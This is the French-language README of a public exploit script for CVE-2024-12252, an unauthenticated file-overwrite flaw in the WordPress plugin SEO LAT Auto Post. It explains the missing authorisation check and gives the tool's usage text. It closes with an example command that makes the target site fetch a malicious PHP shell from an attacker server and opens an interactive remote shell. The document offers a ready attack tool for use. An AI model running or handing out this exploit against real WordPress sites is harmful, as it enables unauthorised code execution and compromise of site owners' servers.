
SEO LAT Auto Post <= 2.2.1 - Autorisation manquante pour l'écrasement/téléversement de fichiers (Exécution de code à distance)
Le plugin SEO LAT Auto Post pour WordPress est vulnérable à l'écrasement de fichier en raison d'un contrôle de capacité manquant sur l'action AJAX remote_update dans toutes les versions jusqu'à 2.2.1 incluse. Cela permet à des attaquants non authentifiés d'écraser le fichier seo-beginner-auto-post.php, ce qui peut être exploité pour parvenir à une exécution de code à distance.
Ce script exploite la vulnérabilité du plugin SEO LAT Auto Post pour parvenir à une exécution de code à distance en écrasant le fichier seo-beginner-auto-post.php. Le script automatise le processus de vérification de la version du plugin, de déclenchement de l'exploit et fournit un shell interactif pour exécuter des commandes.
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
Exécutez le script avec l'URL cible et l'URL de votre shell PHP malveillant :
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php